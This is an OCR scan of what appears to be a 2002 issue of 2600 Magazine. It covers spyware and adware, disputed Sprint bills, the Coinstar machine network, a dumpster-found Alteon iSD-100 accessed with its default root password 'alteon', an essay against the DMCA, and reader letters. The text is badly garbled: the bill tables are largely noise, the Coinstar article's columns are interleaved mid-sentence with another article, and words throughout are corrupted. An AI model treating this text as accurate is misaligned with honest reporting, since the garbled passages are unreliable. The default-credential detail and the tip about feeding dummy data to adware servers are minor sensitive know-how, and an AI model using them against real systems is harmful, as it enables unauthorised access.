most common areas where adware is installed* 
An example of this would be Kazan P2P, which 
by default installs cydoor (cydoor.com). 

Spyware and adware are often hidden deep in 
Lhe Software Licensing documents and Terms 
And Conditions when you install the software* 
This can result in such things as your day-to-day 
activities being broadcast to strangers or annoy- 
ing ads being projected in your face every few 
minutes. 

To make it more confusing adware isn't neces- 
sarily spyware. Registered shareware without ads 
may he spyware, and purchased out of-the-box 
software may contain adware and may also he 
spyware* In addition* software updates may 
change a previously ad -free version into an ad- 
ware product. All this means that users need lo he 
on guard w hen installing any type of software. 

While legitimate adware companies veil] dis- 
close the nature of data that is collected and trans- 
mitted in their privacy statement, there is almost 
no way for Lhe user to actually control what data 
is being sent. The fact is thaL (he technology is in 
theory capable of sending much more than just 
banner statistics - and this is why people (espe- 
cially computer hackers) should feel uncomfort- 
able with lhe idea. 

To top it off* if you have a slow computer or 
Internet connection the resource hogging adware 
or spyware can cause system and browser insta- 
bility and slowness, as well as slow Internet 
connectivity even more. 

How Do You Protect Yourself? 

] . Read the terms and conditions of the license 
carefully before pressing "accept.’ 

2. Run a spyware or adware removal software 
tool, i here are many free versions available. 

3. Avoid spyware at all costs. Run a firewall 
utility like Zone Alarm (zonelabs.com) that spec- 
ifies which programs can access the Internet and 
how. Pay attention to what is asking for permis- 
sion to connect online. 
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to a hacker message hoard or to a hacking 
website. 

5* Avoid adware. If you're broke and can't buy 
a clean shareware product, find uu ad -free, non- 
spyi ng equivalent of the program you need. This 
can be hard since many popular programs come 
only with adware installed* 

6. Learn to use a packet sniffer to identify 
transmissions (hat sneak through your browser 
and other trusted apps* 

7. Get to know your registry really well espe- 

cially the H K E Y _LOC A L_M A C H 1 N E\S O FT- 
WARE* H KE Y_C LFRRENT_U SERVSoftware * 

and for Win2k HKEY. IJSERS\ areas. If you no- 
tice software installed that you are suspicious of* 
check to make sure it's not spyware or adware* 

8. Manage your startup programs carefully. 
Check the registry or use '’msconlig" or a similar 
startup manager or alternatively download and in- 
stall a free task manager to check and kill running 
sp y w are/adwar e . 

9. And finally, you can also reverse engineer 
die adware software and find a way to corrupi the 
data being transmitted. Alternatively develop 
your own program to transmit dummy data lo the 
adware /spy ware host servers. If you do achieve 
this* post ihe results to a hacker message board or 
to a hacking website. 

Some good ad removal programs are: Opl-out 
{grc.com/optout.hlm) and Ad- Aware (lavasoft- 
usaxom). Also, visit the following websites: 
scumware.com, security.knlla.de. and spyware - 
into.com. 

In summary* spyware and adware are not ille- 
gal types of software in any way. However there 
is almost no way for (he user to actually control 
what data is being sent. My guess is that a deliv- 
ery system like the ones used by spyware and ad- 
ware corporations would be the most efficient 
way for governments to spy on the public. They 
probably have already thought of using this sys- 
tem so hackers hew are . 

Sho u is to VISA _hu rg la r»G reg_Ipp, 

Jalaiudinjtumi, _SfR _B U _D_, Scrappy. 
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Page: 1 

Billing Parted Ending; &Z3/02 
Statement Date: Qi 24/02 
Customer dumber 


Summary of CAurgea 


Here's our August 
Sprint bill - a little 
higher than usual, but 
otherwise normal. 


Submitted 
To Your 
Znritt Card 


Total 

Uhpdtd 

Charges 


Taxes anU 
R&pul alary 

tel Chary-e 


Bainni:<i 

Forward 


AccDunl 

djuAlmcnls 


SPRINT 

Charges 


SPRINT 
□ isccurits 


Your charges and credits at a glance 


DESCRIPTION OF TRANSACTIONS 


CREDITS CHARGES 


S PRINT LDO PMT-KCN 7S7 365- 5000 PA 
8 PRINT USAGE ROB TEL 9002307 170 K& 


Well, here's a neat trick. They charged us twice! And from two different states. This 
is what we get lor trusting them to do an automated credit card payment each month 


Page; 1 

Billing Period Ending- 3/2& 
Slat(>Fne<n[ Odie; 9/24/Q2 
Customer Number: 


At least they caught their 
mistake and have given 
us o negative balance. 

But why would they be 
submitting another 
charge to our credit card? 


Summary at Charges 


Tax« a«d 
Regulatory 


Si-danCc 

Forward 


Account 
Adjust rrurnts 


SPRINT 

Chargee 


Ret Charges 


Your charges and credits at a glance 


They charged us again! Even though we have a negative balance! 
It's either incompetence or cunning, 


Again, we still have the same 
acgaiive balance. Apparently, 
Sprint's policy is to credit any 
negative balances on paper hut 
not in reality. They get to hold 
onto our money and at the same 
time claim wc have a credit 
wish them. When we finally 
called them on it, they asked i! 
we would like to have it 
"applied 11 to our account. As if 
there was a SING l .E advantage 
Lo keeping it stuck here! 


Billing Period Ending: 1 0/£3.‘02 
Slatement Date; 10/24/02 
Customer Number; 


Summary of Charges 


Tote l 

Unpaid 


SPRINT 

Charges 


Balance 

Forward 

Account 

Adjustments 

mm 

S.H 


Taxes and 
Regutstory 
Rel. Ctunrges. 

Submitted 
To Your 
Credit Card 

W47 

mm 


TRAN 

POST 

REF. 

DATE 

DATE 

NO. 

0WD3 

0MH 

ZEGG 

0&04 


JAHP 


TRAN 

DATE 

POST 

DATE 

REF 

NO 

DESCRIPTION OF TRANSACTIONS 

CREDITS 

“H 

CHARGES 

09/27 

09/27 

N14A 

SPRINT USAGE ROB TEUHXKOdTtTO SB 


35.0(1 
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EXPOSING the Coinstar N etwork 


by area_5 1 curved, such as in a U -slmpe or in l he shapelaf a 

Located across the United States, and now in section of a torus, and defining a gap is provided 
parts of the United Kingdom and Canada, Comstar w ith a wire winding for excitation and/or ^tec- 

machines are situated in supermarkets everywhere. tion. The sensor can he Used for simultaneously 

Large and green (in the US - blue in foreign mar- obtaining data relating to two or more parameters 
kets), the machines accept unrolled, unsorted of a coin or other object, such as size and uttnduc- 

change and spit out a voucher redeemable for cash tivity of the object. Two or more frequencies can 

for a processing fee. While the concept is simple, be used to sense core and/or cladding properties. 

Comstar has more to it than meets the eye As a Objects recognized as acceptable coins, using the 

previous investor in the company and a frequent sensor data, are diverted by a controllable deflect- 

user of i heir machines, I have learned a great deal ing door, to tubes for delivery to acceptable coin 

about how they work. bins/' 

The machine itself consists of a CRT monitor. Prior to entering the actual sorting mechanism, 
receipt printer, two large plastic bins which hold (he coins are run through a process w hich sorts out 

change, a mechanism for sorting change, a mo- any debris, including washers, paperclips, and 

dem. and (surprisingly) a telephone. The machine anything else that might be in ajar of coins. These 

is controlled by four large buttons, one green, one objects fall into a plastic tray above the soiling 

red. and two gray (newer machines have slightly mechanism, and are not returned to the user, 

different configurations). The user presses the The coins then fall into one of two hi ns: an all- 
green button several limes to enter into the coin pennies bin (pennies make up much of Coin star's 

processing mode, at which point they dump their business) and a bin for the rest of the coins. Jn ac- 

change into a metal tray. The change fulls through tuality, the coins must be taken by armored car to 

a small slot, where it drops down into the sorting another sorting facility where they must be sorted 

mechanism. If too much is change is dropping into once again, as a treasury requirement, 
the sorting mechanism, the slot closes temporarily When the process completes, a receipt is spit 
lo allow the sorting mechanism to catch up. out of the receipt primer, with several security fea- 

The sorting mechanism itself does not involve tures: (1) The Coinstar logo is displayed on the 

the size or the weight of the coin, as ihis is ux> right and left side of the tape when held under ul- 

$low a process and causes too many errors in the traviolct light; (2) On the rear of the receipt, there 

identification of coins. Rattier a complicated is a small box with nothing in it. If a coin is rubbed 

process involving electromagnetic identification is across the box. the Coinstar logo appears, 
used. Coinstar currently holds U.5, Patent Number However, far more interesting than the actual 
6,196,371 for the device and the abstract of the machine is the Coinstar network. Each machine 

patent provides a good explanation of how it contains a modem and a phone. Each machine di- 

works: als the Coinstar headquarters every night and 

Coins, preferably after cleaning, e.g. using a downloads the day's usage statistics. These include 

trommel, are singula ted by a coin pickup assembly the number of coins counted, what types of coins 

configured to reduce jamming. A coin rail assists in were counted, the number of transactions, the av- 

providing separation between coins as they travel erage dollar amount per transaction, and the reject 

past a sensor. The sensor provides an oscillating percentage (used in determining if a machine is re- 

electromagnetic field generated on a single sensing jeering an excessive amount of coins, which is 
core. The oscillating electromagnetic field is com- cause for a technician to be sent out U> examine it), 

posed of one or more frequency components. The A normal reject percentage is around one percent, 

electromagnetic field interacts with a coin, and however slightly higher percentages may be siin- 

these interactions are monitored and used to ela_s- ply due to people inserting all kinds of foreign 

sify the coin according to its physical properties. matter into the machines. 

All frequency components of the magnetic field In addition, the machine analyzes the last 
are phase-locked to a common reference fre- week's worth of usage statistics, and estimates the 

queney. The phase relationships between the van- day it will be full. An armored car will then be 

ous frequencies are fixed. and the interaction of scheduled to empty the machine on that day, or 

each frequency component with the coin can be possibly earlier. The machines also contain diag- 

accurateiy determined without the need for com- nostic software that will automatically page a lech- 

plicated electrical filters. In one embodiment, a ni dan if a problem occurs, 

sensor having a core, preferably ferrite, which is Occasionally, Coinstar sends software updates 
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to the machines to lix bugs, add features, and ad- 
vertise promotions. These updates are also down- 
loaded to the machines during this time period. 

All of these statistics are stored on servers at 
Coinstar's headquarters in Bellevue. Washington, 
and many employees can access them over the net- 
work through software loaded on their computers* 
I received a tour of the headquarters several years 
ago, and at the lime all the servers were running 
NT 4*0. 

1 did notice another interesting feature while at 
Coinstar Headquarters. They had a row til ma- 
chines. dating from the earliest machine through 
their future models that had not yet been released. 
Some machines were on and functioning, others 
were off. However, one (a current model) dis- 
played a "Press CTRL-ALT-DEL to logon mes- 
sage. as commonly seen in Windows NT 3 and 4. 
For this reason, I have a suspicion that the ma- 
chines run some form of Windows in the back- 


by phantasm 
phantasm C? texibox.net 

Among many of the Lhings I love to take purl 
in* dumpster diving always has that small thrill 
of actual treasure hunting. Sooner or later you 
are bound to find a manual with enough infor- 
mation to keep you reading for a lew days or 
evert months. Other times you may get lucky 
and find an old computer that has parts you can 
use. 

A few months ago, during my weekly dive 
excursion, 1 happened to stumble upon quite a 
treasure in my favorite dive spot. On top of the 
dumpster sal a beautiful green system, just un- 
der 18" wide* 24” deep, and L7 inches tall* I 
was quite excited about finding something aside 
from the usual post -it note about where ihey 
were going to eat. or the regular office memo to 
pul cigarettes in the ashtray outside and not on 
the sidewalk. 

I dropped my umbrella, and after a few at- 
tempts to gei to the top of the dumpster, 1 made 
it and put it in my car. Unsure of what exactly it 
was, I dug around a bit more for a manual or 
something about it and found nothing. 

Later that evening I got home and peeled it 
apart, noting it was quite compact internally. In- 
side were three PCI slots used by a Fiber Giga- 
bit E thernet adapter and two CryptoSwift SSL 


ground, or at least have the capability to Jo so 

In addition, the machines contain a phone the 
is I i [iked directly into the CoiiiStar network. If a 
store employee needs to schedule maintenance, 
check the next coin pickup, or do any number oi 
other things* he just needs to open the machine (it 
is locked with a key) and pick up the phone. Also, 
when the machine is opened, a pin code must he 
entered to obtain access to the diagnostic software, 
statistics, and to change the options of the ma- 
chine, This code is also needed to access the 
phone. ] personally have not had the opportunity to 
access this pan of the machine* mainly due to the 
lock and the security cameras right next to it (how- 
ever, the lock is the main obstacle). 

For all its case of use. a lot of technology sits 
behind the green plastic of a Coinstar machine, 
much of which 1 still have yet to uncover. 


cards. The CPU was an Intel Celeron 500, 64 M 
RAM chip, and a 64M CF card as its drive. 
Looking more into if, I noticed there was no 
keyboard pun, or a video connector at all* so 
getting into a console would be a slight 
challenge. 

Alter writing down part numbers, I put it 
back together and did a few searches. It ap- 
peared l had an Alteon iSD- 1 00 and off I was on 
a search for technical documentation* Hooking 
it up and attempting to power it on, I found the 
power button was broken off* A pen lip was all ! 
needed, and the whir of the fans chimed through 
the mom. Running a serial cable from its serial 
port to my system. I tried to get a console that 
way with no luck. 

After a bit more reading. I discovered a need 
for an Alteon WebS witch to access the system, 
So it was time for a lot more research. 

The board inside was I ah led Teknor Appli 
com* Inc.* with a PC L 946-1 system board. B\ 
using a PCI Video Card, I was able to remove 
(he Fiber card and replace it to get a video out 
put of what was going on during boot. I 
quite pleased to see the system was lull\ 
functional and hooting tine. 

Ihe manual for the board showed the pu 
outs for its connectors* which was a woud 
help. 1 was able to find the keyboard intcihm 
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information in the manual (page 108 of the 
PDF)* and set up to find a way to add my own. 

With an old P-II board that got fried* 1 cut 
out its PS/2 keyboard connecLor with some 
snips, removed the excess solder from the pins* 
and cleaned it up for a belter connection. 1 had 
to figure out a way to set up the connector 
around the way this case was set up. In the (rue 
form of imprecision, 1 grabbed a nice length of 
Cat5 cable (once again found dumpster diving) 
and stripped the ends of the wires bare for a 
connection. After some solder work we had the 
wires connected to the PCI -964 board and ran 
the Cat5 to the back of the system to another 
hole provided for another serial port. The con- 
nector was soldered on at the other end and 
some electrical tape to guard ihe bare w ires and 
pins from the ease. 

Plugging up a keyboard, 1 started it up and 
saw the damage that could be done. During the 
BlO*S load* the keyboard Lights came on* and 
Red Hat Linux began to boot. Staring at the Lo- 
gin/Password prompt l was quite excited. Of 
course 1 started with a quick basic guess for root 
with the password alteon and there 1 sat at a 
working console. 

A quick browse around to see what was 
there and 1 powered it down. 1 removed a crypto 
card and popped in a 3Com NIC, rebooted, 
brought up the interface* and turned on SSH. A 
few changes to set it all up automatically for 
me. another power down, removal of the video 
card, and brought it back up, l now had a system 
to play with at my desk for more comfort* 


From there I got a bit more curious and 
wanted to expand the system some more, I 
added 256M of RAM, then attempted to add a 
2()Gig HDD and a CDRQM. I didn't have much 
luck with that, hut found out if I removed the 
CF Card I could use the HDD on /dev/hde 
where the CF used to he. After a bit more play- 
ing. I got Linux installed on the 20 Gig drive on 
/dev/hde and it was working fine as a home 
server. 

The system provided me with well over a 
month of fun and learning* as well as some in- 
teresting calls to Nortel trying to understand the 
BIOS and restrictions set into it. Granted I did 
not get much information - it was brought to my 
attention that reselling it required removing and 
adding a new BIOS chip which I am too lazy to 
do. 

The n i oral of this I ong wind ed arlic le ? 
Dumpster diving can provide you with expen- 
sive treasures and a long time of fun and 
learning. 

Thanks to 404 and Tyler for assistance on 
systems running CompactFlash cards and the 
rest of Textbox Networks for help on other areas 
of learning the system. 

Related Sites 

Alteon Users Guide: http://wwwl42,nortelnet 
works.com/bvdoc/Hlieon/isd_ssl/050 1 25 ,C.pd f 
Te k nor A ppl i c o n i PC I - 946 - 1 H arc! ware G u ide : 
h Li p : //w w w. kont run . com/lech l i b/ni an u al s/PC I - 
946H_and_P3544QBX_manual.pdf 



The Digital Millennium Copyright Act 
(DMCA) and the Digital Media Consumers' 
Rights Act (PMCRA) are at Lhe opposite ends 
of the "copyright rights 1 ' axis, so to speak. Rep- 
resentative Boucher and Doolittle's DMCRA 
will amend the changes made by the DMCA to 
prevent the corporate abuses of pow er that have 
been possible under the DMCA* 

I he DMCA was enacted in 1998 to take el - 
led m the year 2000, The DMCA modified the 
US. copyright statutes to provide protection for 
1 n py righted digital material* Since 1790 Con- 
gress has made modi lie at ions to the U.S. copy- 
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DMCRA 

right statues to accommodate new material. The 
DMCA is just the next step in the series of mod- 
ifications to the copyright statutes* There were 
other reasons for the DMCA's enactment* At the 
1996 World Intellectual Property Organization 
Diplomatic Conference, the U.S. adopted the 
World Intellectual Property Organization treaty. 
There was a perceived need to comply with that 
treaty: the DMCA made that compliance but 
added much more than was necessary. Copy- 
right owners were rightly concerned that their 
works would be pirated on ihe digital frontier. 

Congress did not intend for the DMCA to be 
abused as it is so today. The DMCA was en- 
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acted to dear the gray area of pirating copy- 
righted digital works and lo ban the "black box" 
type devices intended for that purpose. In prac- 
tice it has worked to that end and beyond. The 
new clauses and provisions to the copyright 
statutes have been abused aggressively to stifle 
and control many legitimate activities. The 
DMCA added anti -circu invention measures to 
the copyright statutes that forbid under penally 
of law gaining access to a work by "circumvent- 
ing a technological protection measure that 
would otherwise effectively control access to a 
copyrighted work'. Hie DMCA also prevents 
the import, manufacture, or export of any 
device that can circumvent that protection. 

By doing this the DMCA gives copyright 
holders complete control over their works, no 
matter what the circumstances. Historically, the 
U.S. copyright laws haven't given copyright 
holders this total control. A major "safety" on 
this type of control is Lhe fair use doctrine. Fair 
use allows the end user to make copies of a 
copyrighted work for personal use. educational 
use, use in commentary, criticism, and parody 
or any other solely socially beneficial use, A 
work protected by the DMCA cannot he copied 
by the end user without the express consent of 
the copyright holder. This completely nullifies 
the fair use doctrine and tilts the balance of 
power dangerously tow ard the copyright hold- 
ers. By the same means the DMCA lakes away 
the rights of f irst Sale and Limited Time. First 
Sale gives the end users the right to sell a copy 
of a work over and over once it is made. Lim- 
ited Time limits the lime that a copyright is in 
effect. The copyright is granted for a limited 
time and alter that Lime is up the work goes into 
the public domain. 

The power that copyright holders now have 
over these rights is shown in their use of the 
DMCA. Dimitry Sklyarov, a young Russian 
Ph.D. at Moscow University, was invited to 
speak at Defcon about some of his research. His 
speech outlined Adobe's e-Book security and its 
weaknesses. He and his company had devel- 
oped a program that allowed the end user to 
make copies of an Adobe e-Book, which was 
completely legal in Russia but illegal under Lhe 
DMCA. He was arrested. Not for copyright in- 
fringement or for helping anyone else infringe 
upon copyright, but solely for citing weak- 
nesses in e-Book security. He was arrested be- 
cause someone he never met might use what he 
learned through his research to copy an e-Book 
without the publisher's permission, Adobe used 


the DMCA to punish Sklyarov for speaking out 
about his research. After months of imprison 
ment Sklyarov was linully released under an 
agreement w ith the Department of Justice. Aftei 
his release the DMCA continued to pro sect iu 
his employer, ElcomSofl, under the criminal 
provisions of the DMCA. ElcomSofl is based in 
Russia w here there is no DMCA. The DMCA is 
reaching across continents to stifle free speech 

Prior Lo this, the Motion Picture Association 
of America (MPA A) brought suit against 2600 
Maga z in e fo r pu b I i sh i ng DeCS S on its we h s i te . 
DeCSS is an open source application that al- 
lows Linux users to play DVDs. DeCSS s pri- 
mary use is a DVD player. It also has the ability 
to change file formats from DVD to MPG 
which is like playing a DVD and recording it to 
a VHS tape (which is. again, legal under the fair 
use doctrine). Because it can do this it has be- 
come the target of the MPA A through the 
DMCA, 2600 was not accused of being in- 
volved in the development of this tool, nor was 
it accused of having used the softw are for copy- 
right infringement. The lawsuit was brought 
upon 2600 simply for making the source code 
available. Free speech was denied to 2600 when 
they were enjoined from publishing the DeCSS 
source code. 26(X) lost the case and lost the ap- 
peal. Some good can be said to have come of 
this though - it was decidedly the most public 
display of the dangers of Lhe DMCA ycL The 
case provided a wake-up call to the hacker com- 
munity and gave the world a glimpse of what 
corporations can do with the DMCA. 

In September of 2000 the Secure Digital 
Music Initiative (SDMI) issued a public chal- 
lenge encouraging the hacker community to de- 
feat new watermarking technologies the SDMI 
hoped to use to thwart piracy. Professor Edward 
Pel ten and his team of researchers from Prince- 
ton. Rice, and Xerox took up the challenge and 
succeeded in circumventing the watermark con- 
trols on the music liles. When the team tried to 
show their research at the 2001 Usenix confer 
enee, the SDMI threatened Pel ten with the 
DMCA. The threat w r as in the form of a letter 
that was delivered to Felten and his team as well 
as their employers. Sharing research such as 
Fe! ten's is common practice in the computer sci- 
ence held. It shows others' mistakes and can 
only lead to better solutions. If Felten and his 
team presented their research the original sect! 
rily technology would of course be compro 
raised. but many w f ould offer suggestions to 
improve or replace the weak technology. Even 
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after SDMI had given Felten and his team per- 
mission to circumvent their watermarking tech- 
nologies, they were still able to revoke the right 
of free speech with the DMCA. Fe lien's team 
brought suit against SDMI and subsequently 
made a partial release of their research. 

Prominent Dutch cryptographer Niels Fer- 
guson recently discovered major flaws in a 
commercial hi -definition video encryption sys- 
tem. Ferguson rightly fears legal action under 
the DMCA and has therefore declined to release 
any of his work. He doesn't talk to his peers and 
scientific colleagues for fear of his research 
simply reaching the U.S, which he thinks could 
be interpreted as a violation of the DMCA. 

This ^hows the beginning of a horrible trend. 
Scientists arc withholding research or simply 
avoiding the U.S, out of fear. Scientific devel- 
opment in the U.S. is being stifled for the bene- 
fit of the corporation. Scientists now fear the 
U.S. They fear the "Land of the Free' because 
corporations arc given power over individual 
rights. 

The DMCRA will give that power and the 
rights back, to Lite consumer. This bill will re- 
store the historical balance between copyright 
holders and I he end user, 11 this bill passes in the 
next session, the rights that the DMCA 
threatens will be restored. 

It will reaffirm the fair use doctrine in the 
digital world, making it legal to circumvent a 
technological measure preventing access as 
long as the circumvention falls within the 
guidelines of the fair use doctrine. It adds ex- 
emptions for scientific research which reestab- 
lishes the Beta max standard. The Beta max 
standard would, in the digital world, allow the 
manufacture anti distribution of software or 
hardware that can be used to circumvent tech- 
nological protection measures as long as it has a 
legitimate use. The reestablishment of the Beta- 
max standard would put scientists at ease and 
encourage scientific research to continue as it 
always has in an open forum style without fear 


of prosecution for discoveries. Security can 
again be developed, unimpeded by the DMCA, 
Proper labeling of "copy- protected CDs" will 
also be ensured. This new breed of CDs. mar- 
keted as regular CfX have been known to have 
playback problems and have also crashed quite 
a few computers with their aggressive 
pro te ct i on me as u re s , 

This bill has already won the support of 
many major public entities, l he supporters in- 
clude: Intel Corporation. Phillips Consumer 
Electronics North America, Sun Microsystems. 
Verizon. Gateway Consumer Electronics Asso- 
ciation, American Library Association, Associa- 
tion of tile American Universities, Association 
of Research Libraries, American Association of 
Law Libraries, Medical Library Association, 
Special Liberties Association, Digital Future 
Coalition, Consumers Union, National Writers 
Union, Home Recording Rights Coalition. 
American Foundation for the Blind, and the 
Electronic Frontier Foundation. Many of the 
supporters are library or writer associations of 
some kind. It can be inferred that the libraries 
and writers may fear the DMCA as the means to 
an end of an era. an era of free speech and fair 
use. 

The way is now clear - the public’s rights are 
threatened and the DMCRA is their boon. Li- 
braries and writers across the United Slates 
gather under the DMCRA's flag. Without the 
DMCRA organizations like the MPAA gain 
more o! a foothold in our society. Organizations 
like the Electronic Frontier Foundation have 
long known the effects of the DMCA and the 
power it grants to corporations. The MPA A s 
actions have paid off, but not in their favor. The 
average citizen has at least heard of the DMCA 
and many have now joined the light against it. 
When the DMCRA is enacted, the power will be 
returned to the people. 

Greetz: Kahian. Zim, Bill and Ducky . Save 
Far 8 cape. 
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Spreading News 

Dear 2600: 

Some renters may already know this, but sneake 
majl.com is a service that allows one to generate dis- 
posable email addresses that forward to your real 
address. It provides a self documenting method of 
tracking who sells your email address so that you can 
confront those companies with proof that they sold 
your address, 

NoSpa tim 

Dear 2600: 

In 1 9; 2, you printed a letter from one "MW" who 
was asking about how to send anonymous faxes. For a 
small fee. this person could use an e-fax service such 
as www.maxemail.com to send a fax anywhere the 
user accesses the Internet, Using a good proxy server 
or other anonymous access point would allow the user 
to send an anonymous fax. 

Along these lines, users wishing to receive anony- 
mous faxes may find the free services of 
www.fmxwave.com to be useful. They assign you a 
unique phone number (no extensions!) and receive the 
faxes for you. Upon receipt, the transmission is con- 
verted to a .t if file and emailed to any email address of 
your choosing. All numbers are issued from the 115 
area code and the exchange varies but is usually local 
to Reno, Nevada. 

Keith 

Dear 2600 : 

This is regarding the fax from Direct Media 
America on page 13 of 19:3. Looks like there's an on- 
going investigation of Direct Media America hy the 
Florida Attorney General. 

scott 

We certainly can ! say we're surprised. 

Dear 2600: 

Many people probably already know about this, 
but www payphone-project.com/ is a website with the 
phone numbers to thousands of payphones all around 
the States. 

Sfctrdonicus 

Hopefully the kind that still take incoming calls. 

Dear 2600: 

l truly admire your magazine and how hard the 
staff of 2600 works to show us the information which 
the government and corporations try to control and 
distort. You're a group that the government tries to 
suppress like any group that stands against the system, 
one that will be targeted by those in "control ' just to 
protect their own interests. Soon I'll be starting a 2600 
meeting here in Puerto Rico with technological 
themes and political issues too, highly influenced by 
your magazine. You people are an inspiration lor the 


hacker community and I really appreciate youi 
struggle <md years of dedication. 

cyhernurd 

We wouldn't have gotten anywhere without out 
readers f support. They've made everythin# possible . 

Terrorism Related Issues 

Dear 2600: 

Anyone else notice the eerie resemblance between 
9/11 and its aftermath and Brain Damage's 2/9/91 
broadcast? 

Tresser 

You A referring to an early radio broadcast on 
our website that theorized on the possibility of some 
kind of fit lure attack on U.S . soil as a result of the Gulf 
War. Many people around the world had also consid- 
ered that possibility* And when the attacks came, it 
woke a lot more people up to the fact that our foreign 
policy can come back to haunt us right here. 

Dear 2600: 

This letter probably won't be the only one you get 
on John Mcssner, who has been getting a hit of atten- 
tion on the news lately for 'hacking" aincda.com. an 
Al-Qaida website. He didn't really "hack " anything 
and it's just ano filer example of how loosely the term 
is used. He just decided to give one of those domain 
snatching services (snapnames.com) a try and got 
lucky when the ow ners of alncda tried to switch name 
servers. I'm writing because Mcssner is being made 
out to be some kind of geek hero in the news. I don I 
think he is. In fact, I think he's the exact opposite of 
what computer enthusiasts want to be identified with. 
First of all, he's a pom king (having started some re- 
ally successful girl -next-door type site) which some 
people might find to be cool or whatever. I think it s 
just disgusting. Second of all, the only thing he did 
was get lucky with that name snatching service, which 
takes zero intelligence and only enough "skill 1 to fire 
up Internet Explorer. I had my name snatched by one 
of those things about a year ago and had to pay i 
bucks to get it back Not cool at all - they should be il 
legal. Regardless of whether it was a terrorist website 
or not (actually it was just a pro- Islam site, hut ho 
what's the difference after the Hth anyway?), those 
types of services are just bull and exploiting them like 
that is completely against what being a hacker iv 
about. I'm all for fighting terrorism but this is just u 
other example of someone taking il too far and the 
media glorifying it. We've already got the DMC A and 
Patriot Act to worry about - I don 1 want to have to 
look over my shoulder for vigilante pom bosses il 
want to gel ahold of my website because the) think 
they are somehow fighting terrorism. It also should be 
noted that alneda.com now links to a forum when 
people discuss world issues such as terrorism Most n1 
the talks there are one-sided as can be expected I'm 



I 




Page 30 


2600 Magazine 


those of you w ho care, I am a born and raised North 
Carohman (just in case it sounded like 1 was someone 
u ho didn’t have any investment in the issue of terror- 
ism L Thanks to 2600 for continuing to fight the good 
tight, i hope you guys agree with me on this, but if not 
I'm sure you'll explain why. 

jmu 

This raises a number of interesting points . From 
our understanding, the owners qfolneda.com simply 
didn't renew their domain name in time and someone 
else grabbed it. It's not quite the same thing as steal- 
ing the domain; it's really just a contest to see who's 
paying attention and. unless the name is part of a 
trademark , there's not a lot that can be done about if. 
It may seem unfair bat if a domain is expired, it no 
longer belongs ft} anyone . What snapmtmes does is 
interesting - they will keep this from happening to you 
if you pay them and they will attempt to grab names 
you pay them for the moment they expire. We see no 
reason to outlaw this as they're not doing anything 
wrong. Ultimately their service will become ineffec- 
tive as more such companies pop up. If it can be 
proven that they re accepting money firm i both the do- 
main holder and the person who wants that same do- 
main. that would qualify as a ripeffin our book. As for 
what's currently on the site, it's a free speech issue. 
From what we've seen, anyone is welcome to partici- 
pate (run that they ’re obligated to allow this). What 
she person! s) behind it does for a living is really im- 
material to this, as is identifying what state you hap- 
pen to be from. Nobody's opinions are more or fens 
valid because of their background or location. What 
we can agree on is that this really doesn't have a 
whole lot to do with hacking - it's simply about paying 
attention. 

Dear 2600: 

\ know as do all of your other readers that you are 
against even the so called white hat hacking even if 
(he site being attacked is an enemy of the state. But I 
would have to say that this is just the kind of thing that 
w i c in the hacking community should be doing. 

1 do agree with you however that the attacking and 
redirecting of their funds is crossing the line. But 
there's nothing wrong with gathering "inter on their 
agents, their movements, their strength, etc., and pass- 
ing it on to the appropriate channels so that appropri- 
ate plans can be made, as well as the monitoring of 
rheir electronic fund transfers as that will also give us 
intel on what they are planning. 

! would also have to say that we should support 
those who like Jon Messner through legal means took 
over ownership of a particular domain name. And 
considering that he did legally purchase the aforemen- 
tioned domain name when it was not being used (even 
if it was just fora "split-second,'' it was fair game), he 
did so in a fair and legal move. 

Herman 

As we said above, using an existing system to gain 
an advantage isn 't the problem. But those who believe 
they should act 05 judge, jury , and executioner are de- 
buting themselves. How do you suppose you're going 
to he able to track down "enemy agents" in the first 
place? They don't exactly advertise their presence. 
\nd if you're going to turn any rate in to the authorities 


who espouses an objectionable point of view or runs a 
controversial website, we're going to be facing 
problems of an entire different nature. 

Dear 2666: j I 

In your response in 19:1 lo a letter about cracking 
bank accounts ( "Tracking Terrorists ' \ you said, "11 
you really want to help, the best thing you can do is be 
observant and notice things that other people may not 
notice. Then let people know what you see.” It seems 
to me that this goes against your opposition to the 
TIPS program. The TIPS program is really nothing 
more than a way to gather information that people had 
no easy way of reporting before. But of course people 
can't handle the fact that instead of having important 
criminal activity rnl’o reported to thousands of differ- 
ent sources, they want one contact point. There have 
been anonymous tip lines for other things for a long 
time. One that may help stop and solve crime doesn't 
sound that threatening to me, 

PLMN 

There 3 a difference between being observant and 
being an informant. We encourage the former mean- 
ing we believe people should notice things and tell the 
world what they see. Its kind of our theme. Encourag- 
ing people to report any "suspicious activity" of their 
neighbors (or total strangers) to the authorities is 
about the most unhealthy thing our society needs at 
this point. 

Dear 2660: 

So 1 was there waiting in line at the local FedEx 
for my laptop to come back from being serviced. I 
was behind three gentlemen of Middle Eastern nation- 
ality, Two of them were at the counter talking to a lady 
who worked there. I think they were trying to figure 
out when a package was going to arrive at its desdna- 
tion. Anyhow, while I was looking at my slip. I 
glanced over at the very quiet third man who was sil- 
ting in a chair in from of me. He hud a piece of paper 
and a manila envelope in his hand. On the white piece 
of paper he had written everywhere 

"INS.DA.DOJ.DO?' 1 (1 couldn't make out the last 
character). This was written everywhere, on both sides 
too. Then he flipped his hand over and on the enve- 
lope he had a bunch of words writ ten like a list or ad- 
dress. The only words I could make out were 
[something] Middle School. That's all i could get be- 
fore he got up to leave with the other two men. I don't 
think the envelope had been sent yet because die 
stamps didn't appear to have heen crossed out yet by 
the post office. There were big stamps on it with pic- 
tures of a man w ith a hat on like Eddie Murphy wore 
in The Golden Child. The first thing that came to mind 
when I saw the characters on die letters were those 
letters with the anthrax, I didn't get their license plate 
lor further tracking but they were driving a late 80‘s 
silver Honda Accord. My second thought was why the 
hell would an international terrorist just walk into a 
building holding "evidence?" So what the hell do I 
do? If I let it go and they kill someone, I am a bad per- 
son. ff I call i he police and he turns out to be practic- 
ing his English or he was jusi sending money to his 
family. I am a bad person, l haven't judged yet, but 
what would you do? 1 turned to you guys because 
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you’re probably the mosl neutral people I know, Any 
input would be appreciated, 

Lectoid 

This may be the first time we've ever been called 
neutral. It's important in a rose like this to take fj step 
back and look at the conclusions you've already 
reached. People of Middle Eastern descent are con- 
sidered suspicious by default. Would you have given 
the same amount of scrutiny to someone who looked 
more like you? This guy being quiet also made you 
suspect something. Hut what's so unusual about some- 
one being quiet while they watt in a chair for some- 
one? As for the letters he was scribbling, are we really 
to believe that such a thing is a suspicious activity? 
Even if he was writing down the name of every 1 gov- 
ernment agency he knew, so what ? Having the wools 
